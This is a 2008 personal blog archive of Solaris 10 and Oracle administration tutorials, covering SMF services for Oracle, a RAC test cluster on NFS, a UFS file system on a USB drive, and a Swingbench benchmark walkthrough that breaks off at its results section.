Padraig's Blog: November 2008

Sunday, November 30, 2008

Its Been a While

I had removed this blog but kept getting some emails asking for links to certain posts so I just posted some old posts again so that they are available to anyone who is interested in them.

As an update for what I'm doing, I'm currently in my second year of graduate school. I plan on taking a grad class in database systems next semester so that should be interesting. I'll get to learn a lot about database theory. The class uses Stonebraker's 'Readings in Database Systems' as a textbook along with some more modern research papers so it should be a fun class.

I doubt I will update this much but you never know, stranger things have happened...

Configuring Oracle as a Service in SMF

In Solaris 10, Sun introduced the Service Management Facility (SMF) to simplify management of system services. It is a component of the so called Predictive Self Healing technology available in Solaris 10. The other component is the Fault Management Architecture.

In this post, I will demonstrate how to configure an Oracle database and listener as services managed by SMF. This entails that Oracle will start automatically on boot which means we don't need to go to the bother of writing a startup script for Oracle (even though its not really that hard, see Howard Roger's 10gR2 installation guide on Solaris for an example). A traditional startup script could still be created and placed appropriate /etc/rc*.d directory. These scripts are referred to as legacy run services in Solaris 10 and will not benefit from the precise fault management provided by SMF.

In this post, I am only talking about a single instance environment and I am not using ASM for storage. Also please note that this post is not an extensive guide on how to do this by any
means, it's just a short post on how to get it working. For more information on SMF and Solaris 10 in general, have a look through Sun's excellent online documentation at http://docs.sun.com.

Adding Oracle as a Service

To create a new service in SMF, a number of steps need to be performed (see the Solaris Service Management Facility - Service Developer Introduction for more details). Luckily for me, Joost Mudlers has already done all the necessary work for performing this for Oracle. The package for
installing ora-smf is available from here.

To install this package, download it to an appropriate location (in my case, the root user's home directory) and perform the following:


# cd /var/svc/manifest/application
# mkdir database
# cd ~
# pkgadd –d orasmf-1.5.pkg

There is now some configuration which needs to be performed. Navigate to the /var/svc/manifest/application/database directory. The following files will be present there


# ls -l
-r--r--r--   1 root     bin         2167 Apr 26 09:24 oracle-database-instance.xml
-r--r--r--   1 root     bin         5722 Dec 28  2005 oracle-database-service.xml
-r--r--r--   1 root     bin         2128 Apr 26 09:31 oracle-listener-instance.xml
-r--r--r--   1 root     bin         4295 Dec 28  2005 oracle-listener-service.xml
#

The two files which must be edited are:

oracle-database-instance.xml
oracle-listener-instance.xml

My oracle-database-instance.xml file looked like the following after I edited it according to my environment:


<service_bundle type='manifest' name='oracle-database-instance'>
<service
name='application/oracle/database'
type='service'
version='1'>

<!-- The SMF instance name MUST match the database instance -->
<instance name='orcl1' enabled='false'>
 <method_context
  working_directory='/u01/app/oracle/product/10.2.0/db_1'
  project='oracle'
  resource_pool=':default'>

  <!--
    The credentials of the user with which the method is executed.
  -->
  <method_credential
   user='oracle'
   group='dba'
   supp_groups=':default'
   privileges=':default'
   limit_privileges=':default'/>

  <method_environment>
   <envvar name='ORACLE_SID' value='orcl1' />
   <envvar name='ORACLE_HOME' value='/u01/app/oracle/product/10.2.0/db_1' />

   <!--
    For Oracle 8 & 9
    <envvar name='ORA_NLS33' value='' />
    For Oracle 10g
    <envvar name='ORA_NLS10' value='' />
   -->

  </method_environment>
 </method_context>

</instance>
</service>
</service_bundle>

And my oracle-listener-instance.xml file looked like so after editing:


<service_bundle type='manifest' name='oracle-listener-instance'>
<service
name='application/oracle/listener'
type='service'
version='1'>

<!-- The SMF instance name MUST match the listener instance -->
<instance name='LISTENER' enabled='false'>
 <method_context
  working_directory='/u01/app/oracle/product/10.2.0/db_1'
  project='oracle'
  resource_pool=':default'>

  <!--
   The credentials of the user with which the method is executed.
  -->
  <method_credential
   user='oracle'
   group='dba'
   supp_groups=':default'
   privileges=':default'
   limit_privileges=':default'/>

  <method_environment>
   <envvar name='ORACLE_HOME' value='/u01/app/oracle/product/10.2.0/db_1' />

   <!--
     For Oracle 8 & 9
     <envvar name='ORA_NLS33' value='' />
     For Oracle 10g
     <envvar name='ORA_NLS10' value='' />
   -->

  </method_environment>
 </method_context>

</instance>
</service>
</service_bundle>

In the above configuration files, you can see that I have an instance (orcl1) whose ORACLE_HOME is /u01/app/oracle/product/10.2.0/db_1. I also have a resource project named oracle and the username and group which the Oracle software is installed as is oracle and dba respectively. The most important parameters which must be changed according to your environment are:

ORACLE_HOME
ORACLE_SID
User
Group
Project
Working Directory (in my case, I set it to the same value as ORACLE_HOME)
Instance name (needs to be the same as the ORACLE_SID for the database and the listener name for the listener)

Once these modifications have been performed according to your environment, execute the following to bring the database and listener under SMF control:


# svccfg import /var/svc/manifest/application/database/oracle-database-instance.xml
# svccfg import /var/svc/manifest/application/database/oracle-listener-instance.xml

Now, shut down the database and listener on the host (since this post presumes you are only configuring one database and listener, it shouldn't be too difficult to configure multiple instances though). Then execute the following to enable the database and listener as an SMF service and start the services:


# svcadm enable svc:/application/oracle/database:orcl1
# svcadm enable svc:/application/oracle/listener:LISTENER

In the commands above, the database instance is orcl1 and the listener name is LISTENER. Log of this process are available in the /var/svc/log directory.


# cd /var/svc/log
# ls -ltr application-*
-rw-r--r--   1 root     root          45 Apr 25 20:15 application-management-webmin:default.log
-rw-r--r--   1 root     root         120 Apr 25 20:15 application-print-server:default.log
-rw-r--r--   1 root     root          45 Apr 25 20:15 application-print-ipp-listener:default.log
-rw-r--r--   1 root     root          75 Apr 25 20:16 application-gdm2-login:default.log
-rw-r--r--   1 root     root         566 Apr 26 07:07 application-print-cleanup:default.log
-rw-r--r--   1 root     root         603 Apr 26 07:07 application-font-fc-cache:default.log
-rw-r--r--   1 root     root        3318 Apr 26 10:45 application-oracle-database:orcl1.log
-rw-r--r--   1 root     root        6847 Apr 26 10:47 application-oracle-listener:LISTENER.log
#

Testing Out SMF

Now, to test out some of the functionality of SMF, I'm going to kill the pmon process of the orcl1 database instance. SMF should automatically restart the instance.


# ps -ef | grep pmon
oracle  5113     1   0 10:19:22 ?           0:01 ora_pmon_orcl1
# kill -9 5113

Roughly 10 to 20 seconds later, the database came back up. Looking at the application-oracle-database:orcl1.log file, we can see what happened:


[ Apr 26 10:44:52 Stopping because process received fatal signal from outside the service. ]
[ Apr 26 10:44:52 Executing stop method ("/lib/svc/method/ora-smf stop database orcl1") ]
*********************************************************************
*********************************************************************
** some of '^ora_(lgwr|dbw0|smon|pmon|reco|ckpt)_orcl1' died.
** Aborting instance orcl1.
*********************************************************************
*********************************************************************
ORACLE instance shut down.
[ Apr 26 10:44:53 Method "stop" exited with status 0 ]
[ Apr 26 10:44:53 Executing start method ("/lib/svc/method/ora-smf start database orcl1") ]
ORACLE instance started.
Total System Global Area  251658240 bytes
Fixed Size                  1279600 bytes
Variable Size              83888528 bytes
Database Buffers          163577856 bytes
Redo Buffers                2912256 bytes
Database mounted.
Database opened.
database orcl1 is OPEN.
[ Apr 26 10:45:05 Method "start" exited with status 0 ]

As can be seen from the content of my log file above, SMF discovered that the instance crashed and restarted it automatically. That seems pretty cool to me!

Now, let's try out the same procedure with the listener service.

Almost instantaneously, the listener came back up. Looking through the application-oracle-listener:LISTENER.log file shows us what SMF did:


[ Apr 26 10:47:50 Stopping because process received fatal signal from outside the service. ]
[ Apr 26 10:47:50 Executing stop method ("/lib/svc/method/ora-smf stop listener LISTENER") ]

LSNRCTL for Solaris: Version 10.2.0.2.0 - Production on 26-APR-2007 10:47:51

Copyright (c) 1991, 2005, Oracle.  All rights reserved.

Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=solaris01)(PORT=1521)))
TNS-12541: TNS:no listener
TNS-12560: TNS:protocol adapter error
TNS-00511: No listener
Solaris Error: 146: Connection refused
Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=IPC)(KEY=EXTPROC0)))
TNS-12541: TNS:no listener
TNS-12560: TNS:protocol adapter error
TNS-00511: No listener
Solaris Error: 146: Connection refused
[ Apr 26 10:47:52 Method "stop" exited with status 0 ]
[ Apr 26 10:47:52 Executing start method ("/lib/svc/method/ora-smf start listener LISTENER") ]

LSNRCTL for Solaris: Version 10.2.0.2.0 - Production on 26-APR-2007 10:47:52

Copyright (c) 1991, 2005, Oracle.  All rights reserved.

Starting /u01/app/oracle/product/10.2.0/db_1/bin/tnslsnr: please wait...

TNSLSNR for Solaris: Version 10.2.0.2.0 - Production
System parameter file is /u01/app/oracle/product/10.2.0/db_1/network/admin/listener.ora
Log messages written to /u01/app/oracle/product/10.2.0/db_1/network/log/listener.log
Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=solaris01)(PORT=1521)))
Listening on: (DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(KEY=EXTPROC0)))

Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=solaris01)(PORT=1521)))
STATUS of the LISTENER
------------------------
Alias                     LISTENER
Version                   TNSLSNR for Solaris: Version 10.2.0.2.0 - Production
Start Date                26-APR-2007 10:47:54
Uptime                    0 days 0 hr. 0 min. 0 sec
Trace Level               off
Security                  ON: Local OS Authentication
SNMP                      OFF
Listener Parameter File   /u01/app/oracle/product/10.2.0/db_1/network/admin/listener.ora
Listener Log File         /u01/app/oracle/product/10.2.0/db_1/network/log/listener.log
Listening Endpoints Summary...
(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=solaris01)(PORT=1521)))
(DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(KEY=EXTPROC0)))
Services Summary...
Service "PLSExtProc" has 1 instance(s).
Instance "PLSExtProc", status UNKNOWN, has 1 handler(s) for this service...
The command completed successfully
listener LISTENER start succeeded
[ Apr 26 10:47:54 Method "start" exited with status 0 ]

I havn't really played around too much else with SMF and Oracle at the moment. Obviously, Oracle has a lot of this functionality already available through Enterprise Manager using corrective actions.

Also, its worth pointing out that Oracle does not currently support SMF and does not provide any information or documentation on configuring Oracle with SMF. Metalink Note 398580.1 and Bug 5340239 have more information on this from Oracle.

Saturday, November 29, 2008

srvctl Error in Solaris 10 RAC Environment

If you install a RAC environment on Solaris 10 and set kernel parameters using resource control projects (which is the recommended method in Solaris 10), then you will likely encounter issues when trying to start the cluster database or an individual instance using the srvctl utility. As an example, this is likely what you will encounter:


$ srvctl start instance -d orclrac -i orclrac2
PRKP-1001 : Error starting instance orclrac2 on node nap-rac02
CRS-0215: Could not start resource 'ora.orclrac.orclrac2.inst'.
$

along with the following messages in the alert log


Tue Apr 24 11:36:21 2007
Starting ORACLE instance (normal)
Tue Apr 24 11:36:21 2007
WARNING: EINVAL creating segment of size 0x0000000024802000
fix shm parameters in /etc/system or equivalent

This is because the srvctl utility is unable to get the correct shared memory related settings using prctl as it reads the settings from the /etc/system file. This is documented in bug 5340239 on Metalink.

The only workaround for this at the moment (that I know of) is to manually add the necessary shm parameters to the /etc/system file, for example:


set semsys:seminfo_semmni=100
set semsys:seminfo_semmsl=256
set shmsys:shminfo_shmmax=4294967295
set shmsys:shminfo_shmmni=100

Building a Modified cp Binary on Solaris 10

I thought I would write a post on how I setup my Solaris 10 system to build an improved version of the stock cp(1) utility that comes with Solaris 10 in case anyone arrives here from Kevin Closson's blog. If you are looking for more background information on why I am performing this modification, have a look at this post by Kevin Closson.

GNU Core Utilities

We need to download the source code for the cp utility that we will be modifying. This source code is available as part of the GNU Core Utilities.

Coreutils 5.2.1

Down the software to an appropriate location on your system.

Modifying the Code

Untar the code first on your system.


# gunzip coreutils-5.2.1.tar.gz
# tar xvf coreutils-5.2.1.tar

Proceed to the coreutils-5.2.1/src directory. Open the copy.c file with an editor. The following are the differences between the modified copy.c file and the original copy.c file:


# diff -b copy.c.orig copy.c
287c315
< buf_size =" ST_BLKSIZE">   /* buf_size = ST_BLKSIZE (sb);*/

288a317,319
>
>      buf_size = 8388608 ;
>

Building the Binary

To build the modified cp binary, navigate first to the coreutils-5.2.1 directory. Then enter the following (ensure that the gcc binary is in your PATH first; it is located at /usr/sfw/bin/):


# ./configure
# /usr/ccs/bin/make

We don't want to do make install as is the usual when building something from source like this as it would replace the stock cp(1) utility. Instead, we will copy the cp binary located in the coreutils-5.2.1/src directory like so:


# cp coreutils-5.2.1/src/cp /usr/bin/cp8m

Results of using the Modified cp

See Kevin Closson's post on copying files on Solaris for some in-depth discussion of this topic and more information on the reasoning behind making this modification to the cp(1) utility.

Oracle 10gR2 RAC with Solaris 10 and NFS

Recently, I setup a 2 node RAC environment for testing using Solaris 10 and NFS. This environment consisted of 2 RAC nodes running Solaris 10 and a Solaris 10 server which served as my NFS filer.

I thought it might prove useful to create a post on how this is achieved as I found it to be a relatively quick way to setup a cheap test RAC environment. Obviously, this setup is not supported by Oracle and should only be used for development and testing purposes.

This post will only detail the steps which are specific to this setup; meaning I wont talk about a number of steps which need to be performed such as setting up user equivalence and creating the database. I will mention when these steps should be performed but I point you to Jeffrey Hunter's article on building a 10gR2 RAC on Linux with iSCSI for more information on steps like this.

Overview of the Environment

Here is a diagram of the architecture used which is based on Jeff Hunter's diagram from the previously mentioned article (click on the image to get a larger view):

You can see that I am using an external hard drive attached to the NFS filer for storage. This external hard drive will hold all my database and Clusterware files.

Again, the hardware used is the exact same as the hardware used in Jeff Hunter's article. Notice however that I do not have a public interface configured for my NFS filer. This is mainly because I did not have any spare network interfaces lying around for me to use!

Getting Started

To get started, we will install Solaris 10 for the x86 architecture on all three machines. The ISO images for Solaris 10 x86 can be downloaded from Sun's website here. You will need a Sun Online account to access the downloads but registration is free and painless.

I won't be covering the Solaris 10 installation process here but for more information, I refer you to the official Sun basic installation guide found here.

When installing Solaris 10, make sure that you configure both network interfaces. Ensure that you do not use DHCP for either network interface and specify all the necessary details for your environment.

After installation, you should update the /etc/inet/hosts file on all hosts. For my environment as shown in the diagram above, my hosts file looked like the following:


#
# Internet host table
#
127.0.0.1 localhost

# Public Network - (pcn0)
172.16.16.27 solaris1
172.16.16.28 solaris2

# Private Interconnect - (pcn1)
192.168.2.111 solaris1-priv
192.168.2.112 solaris2-priv

# Public Virtual IP (VIP) addresses for - (pcn0)
172.16.16.31 solaris1-vip
172.16.16.32 solaris2-vip

# NFS Filer - (pcn1)
192.168.2.195 solaris-filer

The network settings on the RAC nodes will need to be adjusted as they can affect cluster interconnect transmissions. The UDP parameters which need to be modified on Solaris are udp_recv_hiwat and udp_xmit_hiwat. The default values for these parameters on Solaris 10 are 57344 bytes. Oracle recommends that these parameters are set to at least 65536 bytes.

To see what these parameters are currently set to, perform the following:


# ndd /dev/udp udp_xmit_hiwat
57344
# ndd /dev/udp udp_recv_hiwat
57344

To set the values of these parameters to 65536 bytes in current memory, perform the following:


# ndd -set /dev/udp udp_xmit_hiwat 65536
# ndd -set /dev/udp udp_recv_hiwat 65536

Now we obviously want these parameters to be set to these values when the system boots. The official Oracle documentation is incorrect when it states that the parameters are set on boot when they are placed in the /etc/system file. The values placed in /etc/system will have no affect on Solaris 10. Bug 5237047 has more information on this.

So what we will do is to create a startup script called udp_rac in /etc/init.d. This script will have the following contents:


#!/sbin/sh
case "$1" in
'start')
ndd -set /dev/udp udp_xmit_hiwat 65536
ndd -set /dev/udp udp_recv_hiwat 65536
;;
'state')
ndd /dev/udp udp_xmit_hiwat
ndd /dev/udp udp_recv_hiwat
;;
*)
echo "Usage: $0 { start | state }"
exit 1
;;
esac

Now, we need to create a link to this script in the /etc/rc3.d directory:


# ln -s /etc/init.d/udp_rac /etc/rc3.d/S86udp_rac

Configuring the NFS Filer

Now that we have Solaris installed on all our machines, its time to start configuring our NFS filer. As I mentioned before, I will be using an external hard drive for storing all my database files and Clusterware files. If you're not using an external hard drive you can ignore the next paragraph.

In my previous post, I talked about creating a UFS file system on an external hard drive in Solaris 10. I am going to be following that post exactly. So if you perform what I mention in that post, you will have a UFS file system ready for mounting.

Now, I have a UFS file system created on the /dev/dsk/c2t0d0s0 device. I will create a directory for mounting this file system and then mount it:


# mkdir -p /export/rac
# mount -F ufs /dev/dsk/c2t0d0s0 /export/rac

Now that we have created the base directory, lets create directories inside this which will contain the various files for our RAC environment.


# cd /export/rac
# mkdir crs_files
# mkdir oradata

The /export/rac/crs_files directory will contain the OCR and the voting disk files used by Oracle Clusterware. The /export/rac/oradata directory will contain all the Oracle data files, control files, redo logs and archive logs for the cluster database.

Obviously, this setup is not ideal since everything is on the same device. For setting up this environment, I didn't care. All I wanted to do was get a quick RAC environment up and running and show how easily it can be done with NFS. More care should be taken in the previous step but I'm lazy...

Now we need to make these directories accessible to the Oracle RAC nodes. I will be accomplishing this using NFS. We first need to edit the /etc/dfs/dfstab file to specify which directories we want to share and what options we want to use when sharing them. The dfstab file I configured looked like so:


#       Place share(1M) commands here for automatic execution
#       on entering init state 3.
#
#       Issue the command 'svcadm enable network/nfs/server' to
#       run the NFS daemon processes and the share commands, after adding
#       the very first entry to this file.
#
#       share [-F fstype] [ -o options] [-d ""]  [resource]
#       .e.g,
#       share  -F nfs  -o rw=engineering  -d "home dirs"  /export/home2
share -F nfs -o rw,anon=175 /export/rac/crs_files
share -F nfs -o rw,anon=175 /export/rac/oradata

The anon option in the dfstab file as shown above, is the user ID of the oracle user on the cluster nodes. This user ID should be the same on all nodes in the cluster.

After editing the dfstab file, the NFS daemon process needs to be restarted. You can do this on Solaris 10 like so:


# svcadm restart nfs/server

To check if the directories are exported correctly, the following can be performed from the NFS filer:


# share
-               /export/rac/crs_files   rw,anon=175   ""
-               /export/rac/oradata     rw,anon=175   ""
#

The specified directories should now be accessible from the Oracle RAC nodes. To verify that these directories are accessible from the RAC nodes, run the following from both nodes (solaris1 and solaris2 in my case):


# dfshares solaris-filer
RESOURCE                                  SERVER ACCESS    TRANSPORT
solaris-filer:/export/rac/crs_files    solaris-filer  -         -
solaris-filer:/export/rac/oradata      solaris-filer  -         -
#

The output should be the same on both nodes.

Configure NFS Exports on Oracle RAC Nodes

Now we need to configure the NFS exports on the two nodes in the cluster. First, we must create directories where we will be mounting the exports. In my case, I did this:


# mkdir /u02
# mkdir /u03

I am not using u01 as I'm using this directory for installing the software. I will not be configuring a shared Oracle home in this article as I wanted to keep things as simple as possible but that might serve as a good future blog post.

For mounting the NFS exports, there are specific mount options which must be used with NFS in an Oracle RAC environment. The mount command which I used to manually mount these exports is as follows:


# mount -F nfs -o rw,hard,nointr,rsize=32768,wsize=32768,noac,proto=tcp,forcedirectio,vers=3 \
solaris-filer:/export/rac/crs_files /u02
# mount -F nfs -o rw,hard,nointr,rsize=32768,wsize=32768,noac,proto=tcp,forcedirectio,vers=3 \
solaris-filer:/export/rac/oradata /u03

Obviously, we want these exports to be mounted at boot. This is accomplished by adding the necessary lines to the /etc/vfstab file. The extra lines which I added to the /etc/vfstab file on both nodes were (the output below did not come out very well originally so I had to split each line into 2 lines):


solaris-filer:/export/rac/crs_files   -   /u02   nfs   -   yes
rw,hard,bg,nointr,rsize=32768,wsize=32768,noac,proto=tcp,forcedirectio,vers=3
solaris-filer:/export/rac/oradata     -   /u03   nfs   -   yes
rw,hard,bg,nointr,rsize=32768,wsize=32768,noac,proto=tcp,forcedirectio,vers=3

Configure the Solaris Servers for Oracle

Now that we have shared storage setup, it's time to configure the Solaris servers on which we will be installing Oracle. One little thing which must be performed on Solaris is to create symbolic links for the SSH binaries. The Oracle Universal Installer and configuration assistants (such as NETCA) will look for the SSH binaries in the wrong location on Solaris. Even if the SSH binaries are included in your path when you start these programs, they will still look for the binaries in the wrong location. On Solaris, the SSH binaries are located in the /usr/bin directory by default. The OUI will throw an error stating that it cannot find the ssh or scp binaries. My simple workaround was to simply create a symbolic link in the /usr/local/bin directory for these binaries.


# ln -s /usr/bin/ssh /usr/local/bin/ssh
# ln -s /usr/bin/scp /usr/local/bin/scp

You should also create the oracle user and directories now before configuring kernel parameters.

For configuring and setting kernel parameters on Solaris 10 for Oracle, I point you to this excellent installation guide for Oracle on Solaris 10 by Howard Rogers. It contains all the necessary information you need for configuring your Solaris 10 system for Oracle. Just remember to perform all steps mentioned in his article on both nodes in the cluster.

What's Left to Do

From here on in, its quite easy to follow Jeff Hunter's article. Obviously, you wont be using ASM. The only differences between what to do now and what he has documented is file locations. So you could follow along from section 14 and you should be able to get a 10gR2 RAC environment up and running. Obviously, there is some sections such as setting up OCFS2 and ASMLib that can be left out since we are installing on Solaris and not Linux.

Creating a UFS File System on an External Hard Drive with Solaris 10

Recently, I wanted to create a UFS file system on a Maxtor OneTouch II external hard drive I have. I wanted to use the external hard drive for storing some large files and I was going to use the drive exclusively with one of my Solaris systems. Now, I didn't find much information on the web about how to perform this with Solaris (maybe I wasn't searching very well or something) so I thought I would post the procedure I followed here so I'll know how to do it again if I need to.

After plugging the hard drive into my system via one of the USB ports, we can verify that the disk was recognized by the OS by examining the /var/adm/messages file. With the hard drive I was using, I saw entries like the following:


Mar  2 13:10:33 solaris-filer usba: [ID 912658 kern.info] USB 2.0 device (usbd49,7100) operating at hi speed (USB 2.x) on USB 2.0 root hub: storage@3, scsa2u
sb0 at bus address 2
Mar  2 13:10:33 solaris-filer usba: [ID 349649 kern.info]       Maxtor OneTouch II L60LHYQG
Mar  2 13:10:33 solaris-filer genunix: [ID 936769 kern.info] scsa2usb0 is /pci@0,0/pci1028,11d@1d,7/storage@3
Mar  2 13:10:33 solaris-filer genunix: [ID 408114 kern.info] /pci@0,0/pci1028,11d@1d,7/storage@3 (scsa2usb0) online
Mar  2 13:10:33 solaris-filer scsi: [ID 193665 kern.info] sd1 at scsa2usb0: target 0 lun 0

The dmesg command could also be used to see similar information. Also, we could use the rmformat command (this lists removable media) to see this information in a much nicer format like so:


# rmformat -l
Looking for devices...
   1. Logical Node: /dev/rdsk/c1t0d0p0
      Physical Node: /pci@0,0/pci-ide@1f,1/ide@1/sd@0,0
      Connected Device: QSI      CDRW/DVD SBW242U UD25
      Device Type: DVD Reader
   2. Logical Node: /dev/rdsk/c2t0d0p0
      Physical Node: /pci@0,0/pci1028,11d@1d,7/storage@3/disk@0,0
      Connected Device: Maxtor   OneTouch II      023g
      Device Type: Removable
#

Now that we now the drive has been identified by Solaris (as /dev/rdsk/c2t0d0p0) we need to create one Solaris partition (this is Solaris 10 running on the x86 architecture) that uses the whole disk. This accomplished by passing the -B flag to the fdisk command, like so:


# fdisk -B /dev/rdsk/c2t0d0p0

Now we will print the disk table to standard out like so:


# fdisk -W - /dev/rdsk/c2t0d0p0

This will output the following information to the screen for the hard drive I am using:



* /dev/rdsk/c2t0d0p0 default fdisk table
* Dimensions:
*    512 bytes/sector
*     63 sectors/track
*    255 tracks/cylinder
*   36483 cylinders
*
* systid:
*    1: DOSOS12
*    2: PCIXOS
*    4: DOSOS16
*    5: EXTDOS
*    6: DOSBIG
*    7: FDISK_IFS
*    8: FDISK_AIXBOOT
*    9: FDISK_AIXDATA
*   10: FDISK_0S2BOOT
*   11: FDISK_WINDOWS
*   12: FDISK_EXT_WIN
*   14: FDISK_FAT95
*   15: FDISK_EXTLBA
*   18: DIAGPART
*   65: FDISK_LINUX
*   82: FDISK_CPM
*   86: DOSDATA
*   98: OTHEROS
*   99: UNIXOS
*  101: FDISK_NOVELL3
*  119: FDISK_QNX4
*  120: FDISK_QNX42
*  121: FDISK_QNX43
*  130: SUNIXOS
*  131: FDISK_LINUXNAT
*  134: FDISK_NTFSVOL1
*  135: FDISK_NTFSVOL2
*  165: FDISK_BSD
*  167: FDISK_NEXTSTEP
*  183: FDISK_BSDIFS
*  184: FDISK_BSDISWAP
*  190: X86BOOT
*  191: SUNIXOS2
*  238: EFI_PMBR
*  239: EFI_FS
*

* Id    Act  Bhead  Bsect  Bcyl    Ehead  Esect  Ecyl    Rsect    Numsect
191   128  0      1      1       254    63     1023    16065    586083330

We now need to calculate the maximum amount of usable storage. This is done by multiplying bytes/sectors (512 in my case) by the number of sectors listed at the bottom of the output shown above. We then divide this number by 1024*1024 to yield MBs.

So in my case, this will work out as 286173.5009765625 MB.

Now, we need to setup a partition table file. This will be a regular text file and you can name it whatever you like. For the sake of this post, I will name it disk_slices.txt. The contents of this file are:


slices: 0 = 2MB, 286170MB, "wm", "root" :
      1 = 0, 1MB, "wu", "boot" :
      2 = 0, 286172MB, "wm", "backup"

To create these slices on the disk, we run:


# rmformat -s disk_slices.txt /dev/rdsk/c2t0d0p0
# devfsadm
# devfsadm -C

To create the UFS file system on the newly created slice, I run the following and the output from running this command is also shown:


# newfs /dev/rdsk/c2t0d0s0
newfs: construct a new file system /dev/rdsk/c2t0d0s0: (y/n)? y
/dev/rdsk/c2t0d0s0:     586076160 sectors in 95390 cylinders of 48 tracks, 128 sectors
      286170.0MB in 5962 cyl groups (16 c/g, 48.00MB/g, 5824 i/g)
super-block backups (for fsck -F ufs -o b=#) at:
32, 98464, 196896, 295328, 393760, 492192, 590624, 689056, 787488, 885920,
Initializing cylinder groups:
...............................................................................
........................................
super-block backups for last 10 cylinder groups at:
585105440, 585203872, 585302304, 585400736, 585499168, 585597600, 585696032,
585794464, 585892896, 585991328
#

And now I'm finished, I now have a UFS file system created on my USB hard drive which can be mounted by my Solaris system. To mount this file system, I can just:


# mount -F ufs /dev/rdsk/c2t0d0p0 /u01

Tuesday, November 25, 2008

Playing with Swingbench

Swingbench is a free load generator (and benchmarks generator) designed by Dominic Giles to stress test an Oracle database. In this post, I will be playing with Swingbench and showing how it can be used. This article will focus on comparing the performance of buffered I/O versus un-buffered I/O (i.e. direct I/O) using the Swingbench tool. Since this article is not about direct I/O (I encourage the interested reader to have a look here for more information on this topic), any results presented here should not be considered conclusive. The results presented are very simple and not complicated at all so should not be taken very seriously. The main point of this article is demonstrate the Swingbench utility; how to set it up and use it.

A Note About the Environment Used for Testing

Before we delve into using Swingbench, I thought I should mention a little about the environment used for testing as it affects the results a lot! The box used to run the database in this post is a Dell Latitude D810 laptop with a 2.13 GHz processor and 1GB of RAM. It is running on Solaris 10, specifically the 11/06 release. The datafiles and redo log files are stored on a Maxtor OneTouch II external hard drive connected via a USB 2.0 interface.

The datafiles for the database reside on a 80 GB partition which is formatted with a UFS filesystem and the redo logs reside on a 20 GB partition which is also formatted with a UFS filesystem. The database is not running in archive log mode and there is no flash recovery area configured.

Enabling Direct I/O

One quick section on how we will be enabling direct I/O for testing purposes. The UFS file system (as does most file systems) supports mounting the file system options which enable processes to bypass the OS page cache. One way to enable direct I/O on a UFS file system is to mount the file system with the forcedirectio mount option as so:


# mount -o forcedirectio /dev/dsk/c2t1d0s1 /u02

Another method which is possible is setting the FILESYSTEMIO_OPTIONS=SETALL parameter within Oracle (available in 9i and later). As Glenn Fawcett states in this excellent post on direct I/O, the SETALL value passed to the FILESYSTEMIO_OPTIONS parameters sets all the options for a particular file system to enable direct I/O or async I/O. When this parameter is set as stated, Oracle will use an API to enable direct I/O when it opens database files.

Swingbench Installation and Configuration

Now that we've got the preliminaries out of the way, its time to get on to the main reason for this post. The Swingbench code is shipped in a zip file which can be downloaded from here. A prerequisite for running Swingbench is that a Java virtual machine needs to be present on the machine which you will be running Swingbench on.

After unzipping the Swingbench zip file, you will need to edit the swingbench.env file (if on a UNIX platform) found in the top-level swingbench directory. The following variables need to be modified according to your environment:

ORACLE_HOME
JAVA_HOME
SWINGHOME

If using the Oracle instance client software instead of a full RDBMS install on the machine you are running Swingbench, the CLASSPATH variable must also be modified from $ORACLE_HOME/jdbc/lib/ojdbc14.jar to $ORACLE_HOME/lib/ojdbc14.jar.

Installing Calling Circle

The Calling Circle is an open-source preconfigured benchmark which comes with Swingbench. The Order Entry benchmark also comes with Swingbench but for the purposes of this article, we will only discuss the Calling Circle benchmark.

The Calling Circle benchmark implements an example OLTP online telecommunications application. The goal of this application is to simulate a randomized workload of customer transactions and measure transaction throughput and response times. Approximately 97 % of the transactions cause at least one database update, with well over three quarters performing two or more updates. More information can be found in the Readme.txt file which comes with the Swingbench software.

The first step for installing Calling Circle is to create the Calling Circle schema (CC) in the database. This is achieved using the ccwizard executable found in the swingbench/bin directory .


$ ./ccwizard

Click [Next] on the welcome screen and you will then be presented with the screen shown on the below:

Choose the option to create the Calling Circle schema. In the next screen, enter the connection details of the database you will be creating the schema in. This will involve entering the host name, port number (if not using the default port of 1521 for your listener) and the database service name. Also, ensure that you choose the type IV Thin JDBC driver. Click [Next] when you have entered this information.

The next screen involves the schema details for the Calling Circle schema. Enter appropriate locations for the datafiles on your system. When finished entering information on this screen, click [Next] to continue. This will bring you to the Schema Sizing window as shown below:

Use the slider to select the schema size you wish to use. For this post, I chose to use a schema size with 2,023,019 customers which implies a tablespace of size 2.1GB for data and a tablespace of size 1.3GB for indexes. When finished choosing your schema size, click [Next] to continue. Click [Finish] on the next screen to complete the wizard and create the schema. A progress bar will appear as shown below

Creating the Input Data for Calling Circle

Before each run of the Calling Circle application it is necessary to create the input data for the benchmark to run. This is accomplished using the ccwizard program we used previously for creating the Calling Circle schema. Start up the ccwizard program again and click [Next] on the welcome screen. On the "Select Task" screen show previously, this time select to "Generate Data for Benchmark Run" and click [Next].

In the "Schema Details" window which follows, enter the details of the schema which you created in the last section. Click [Next] once all the necessary information has been entered. You will then be presented with the "Benchmark Details" screen as shown below:

In this post, we will use 1000 transactions for each test as seen in the "Number of Transactions" dialog window above. Press [Next] to continue and you will be presented with the final screen. Click [Finish] to create the benchmark data.

Starting the Benchmark Test

Now that we have the Calling Circle schema created and the input data generated, we can start our tests. To start up Swingbench and ensure that it operates with the Calling Circle benchmark we can pass the sample Calling Circle configuration file (ccconfig.xml) which is supplied with Swingbench as a runtime parameter as so:


$ ./swingbench -c sample/ccconfig.xml

This will start up Swingbench with the sample configuration for the Calling Circle application but only a few settings need to be changed for is to use this configuration. All that needs to be changed is the connection settings for the host you have already setup the Calling Circle schema on. Change the connection settings as necessary for your environment.

The following screen shot show the Calling Circle application running in Swingbench:

We will be performing 1000 transactions during each test run as specified when we generated the sample data. The Swingbench configuration we will be using for every test we perform is as follows:

This workload is typical of an OLTP application with 40% reads and 60% writes. The number of users associated with the workload is 15. We will use this exact workload for every test we perform.

Results & Conclusion

The measurements from Swingbench which we will use for comparing the performance of a UFS file system when Oracle uses direct I/O versus buffered I/O are the following:

